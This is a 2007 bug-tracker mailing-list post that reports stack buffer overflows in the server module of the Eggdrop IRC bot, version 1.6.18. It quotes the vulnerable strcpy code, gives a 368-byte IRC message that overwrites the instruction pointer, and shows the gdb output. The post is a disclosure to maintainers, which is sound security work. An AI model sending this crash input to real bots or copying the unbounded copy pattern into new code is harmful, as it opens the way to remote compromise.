Bugs: Re: server module buffer overflows

Forever B0rked forever.b0rked at gmail.com
Sun Apr 15 15:52:02 CST 2007


I forgot to mention that the tested version was 1.6.18.

On 4/15/07, Forever B0rked <forever.b0rked at gmail.com> wrote:
>
> I was taking a quick look at some of the code behind the eggie modules and
> I ran across a few stack based overflows. I am incredibly surprised that no
> one has reported these yet.
>
> It seems that you are relying on the fact that the server the bot is
> connected to is sane and not malicious, but I was able to exploit these
> flaws by opening a
> netcat listener and connecting the bot to it, then sending whatever string
> I needed to.
>
> For example:
>
> static int gotmsg(char *from, char *msg)
> {
>   char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
>        *p, *p1, *code;
>
> .......
>
> ignoring = match_ignore(from);
>   to = newsplit(&msg);
>   fixcolon(msg);
>   /* Only check if flood-ctcp is active */
>   strcpy(uhost, from);
>
> By sending the following string:
>
>
> :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
>
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test
>
> (thats 368 bytes)
>
> gdb output:
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to process 14990]
> 0x42424242 in ?? ()
> (gdb) i r $eip
> eip            0x42424242       0x42424242
>
> You overwrite the instruction pointer with 0x42424242. It should be
> obvious that this could allow remote code execution as well. I didn't spend
> too much time looking at the rest of the code, this just happened to catch
> my eye while I was glancing over it. I did notice a few others that were
> along the same lines as this, but I didn't test them or document them,
> although I would be happy to do if you want more information.
>
> Given the fact that you have to convince someone to connect to a malicious
> server, this isn't -THAT- serious, but if someone had the proper console
> permissions or was able to coerce someone to connect their eggdrop to a
> malicious server, then it could result in a compromise.
>
> If you have any other questions then please let me know. I might go
> through the rest of the code in greater depth later, but I don't have the
> time right now.
>
>



More information about the Bugs mailing list